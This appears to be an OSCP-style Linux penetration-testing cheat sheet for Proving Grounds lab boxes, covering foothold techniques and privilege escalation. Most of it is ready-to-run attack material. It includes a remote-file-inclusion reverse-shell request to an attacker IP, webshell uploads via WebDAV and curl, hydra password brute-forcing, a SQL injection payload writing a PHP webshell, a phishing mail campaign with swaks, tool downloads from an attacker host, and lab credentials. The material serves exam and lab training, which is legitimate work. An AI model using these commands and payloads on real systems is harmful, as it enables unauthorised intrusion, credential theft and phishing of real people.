Linux

Based on the following PG Practice, PG Play, and PEN-200 boxes: Amaterasu, Apex, Astronaut, BBScute, BitForge, Blogger, Bratarina, Bullybox, ClamAV, Clue, Cockpit, Exfiltrated, Extplorer, Fanatastic, Fired, Flu, FunboxEasyEnum, Gaara, GlasgowSmile, Hawat, Hetemit, Hunit, LaVita, Levram, Loly, Mantis, Marketing, Mzeeav, Nibbles, Nukem, Payday, PC, Pebbles, Pelican, Peppo, Postfish, Potato, QuackerJack, Readys, Roquefort, Scrutiny, Snookums, Sorcerer, SpiderSociety, SPX, Stapler, Sybaris, Vmdak, Walla, WallpaperHub, Wombo, Workaholic, Xposedapi, Zab, ZenPhoto, Zipper, Crystal (OSCP A), Aero (OSCP A), Berlin (OSCP B), Kiero (OSCP B), Frankfurt (OSCP C), and Charlie (OSCP C).

Foothold

Port Scan

The nmap-scan script can be found here.

$ sudo nmap-scan <target-IP>

HTTP(S)

Dirbust HTTP(S) ports with a directory list (plus server-specific extensions) and a file list

# Dirbust with a directory list
$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -ic -ac -c -u http://access/FUZZ -e .aspx,.php,



# Dirbust with a file list
$ ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -ic -ac -c -u http://access/FUZZ

Application-specific PoCs (RCE, LFI, RFI)

# CLI tool
searchsploit <appName> <version>

# Google dork
site:github.com <appName> exploit poc

# RFI revshell
curl --path-as-is -s "http://10.10.10.10:4443/site/index.php?page=http://192.168.45.241:443/revshell_ivan.php" --proxy 127.0.0.1:8080

File Uploads
Default/Weak Creds

uv run creds search <appName>

# POST request
hydra -L /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -P /usr/share/wordlists/rockyou.txt 'http-post-form://target:8081/login.aspx:username=^USER^&password=^PASS^:F=403'

# POST request (base64-encoded credentials)
hydra -L /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -P /usr/share/wordlists/rockyou.txt 'http-post-form://target:8081/login.aspx:username=^USER64^&password=^PASS64^:F=403'

WebDAV

# Connect to WebDAV
$ cadaver http://x7331
Authentication required for hutch on server 'x7331':
Username: x7331
Password:
# Upload a webshell
dav:/> put /usr/share/webshells/aspx/cmdasp.aspx cmdasp.aspx

# Upload a webshell directly
$ curl -T '/home/kali/shell.aspx' 'http://192.168.64.122/' -u x7331:Pass123!

Custom wordlists

# Create a userlist based on the site users
username-anarchy -i site_users > anarchy_output

# Create a passlist based on the site content
cewl --write cewl_output http://192.168.202.21/

Git repositories

# Dump the repository
git-dumper http://target.lab/.git git_repo

# Write all commits to a file
git log | grep commit | cut -d " " -f2 | xargs git show > commits

# Open the commits file with VSCode
code commits

SQLi (sqlmap is allowed for enumeration but not for exploitation)

# Enumeration
sqlmap -r login.req --batch

Unique Ports

SMB

Known vulnerabilities

sudo nmap -script=smb-vuln\* -p445 10.10.10.10

List and enumerate shares

# List shares and permissions
$ uv run nxc smb DC01 -u celia.almeda -p 7k8XHk3dMtmpnC7 --shares

# Download the target share
$ nxc smb MS02 -u x7331 -p Pass123! -M spider_plus -o DOWNLOAD_FLAG=True OUTPUT_FOLDER=./ MAX_FILE_SIZE=99999999

# Connect and download all files
$ smbclient //target/share -p 12445
Password for [WORKGROUP\x7331]:
Anonymous login successful        
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

WRITE access (steal hashes)

FTP

Anonymous login

# Anonymous login
ftp anonymous@target
ftp ftp@target

hydra -l <user> -P <passlist> ftp://<target>

Enumerate directories

# Download dir
wget -r ftp://ftp@target_directory

Upload files

ftp> put revshell_ivan.php

SMTP, POP3

Username enumeration (SMTP)

smtp-user-enum -M VRFY -U anarchy_output -t 10.10.10.10

Inbox enumeration (POP3)

$ telnet 10.10.10.10 110
USER x7331
+OK x7331 is known here.
PASS Pass123!
+OK Welcome! 4 messages (4744 bytes)
LIST
+OK 4 messages, 4744 bytes
1 1342
2 963
3 1347
4 1092
RETR 1

Phising attachments (library-ms, libre-office, pdf) or malicious links

# Email body with a malicious link
$ cat body.txt
Please lick here to register: http://192.168.45.170/login.html

# Send an email to multiple email addresses
$ swaks --to $(cat emails.txt | tr '\n' ',') --from it@target.off --header "Subject: ERP Registration link" --body @body.txt --server 192.168.161.137 --port 25

# Listener to receive the response
$ sudo nc -lvnp 80

Databases

MySQL/MariaDB

# Connect
mysql -h kali -u x7331 -pPass123! --skip-ssl

# Webshell
'UNION SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/srv/http/webshell.php';--

PostgreSQL

# Connect
psql -h 127.0.0.1 -p 5437 -U postgresql -W

SNMP

# User-related strings
snmpwalk -v2c -c public <target> 1.3.6.1.4.1

# Public strings
snmpwalk -v2c -c public <target>

# Grep for keywords
snmpwalk -v2c -c public <target> | grep -Ei 'user|admin|name|pass|password'

# System-related strings
snmpwalk -v2c -c public <target> 1.3.6.1.2.1.1

# Running processes
snmpwalk -v2c -c public <target> 1.3.6.1.2.1.25.4.2.1.2

Privilege Escalation

User Context

Permissions, groups, and shell history

$ sudo -l


$ id


$ cat /home/<user>/.bash_history

Host Enumeration

Manual Enumeration

# Enumerate SUIDs
find / -type f -perm -u=s 2>/dev/null

# Enumerate capabilities
getcap -r / 2>/dev/null

# Local TCP sockets
netstat -anot

# Cronjobs
cat /etc/crontab

# Environment variables
env

# Sudo version
sudo --version

# Kernel version
uname -a

LinPEAS

$ wget 192.168.45.216:443/linpeas.sh
$ chmod +x linpeas.sh
$ ./linpeas.sh

Running processes (pspy, let it run for at least two minutes)

$ wget 192.168.45.216:443/pspy64
$ chmod +x pspy64
$ ./pspy64

Passwords

grep -rH "password"

SMB

List and enumerate shares

# List shares and permissions
uv run nxc smb DC01 -u celia.almeda -p 7k8XHk3dMtmpnC7 --shares

# Download the target share
nxc smb MS02 -u x7331 -p Pass123! -M spider_plus -o DOWNLOAD_FLAG=True OUTPUT_FOLDER=./ MAX_FILE_SIZE=99999999

WRITE access (steal hashes)

MySQL/MariaDB

Enumerate tables

mysql -h 127.0.0.1 -u x7331 -pPass123! --skip-ssl

PreviousWindows NextCRTP

Last updated 3 months ago

Was this helpful?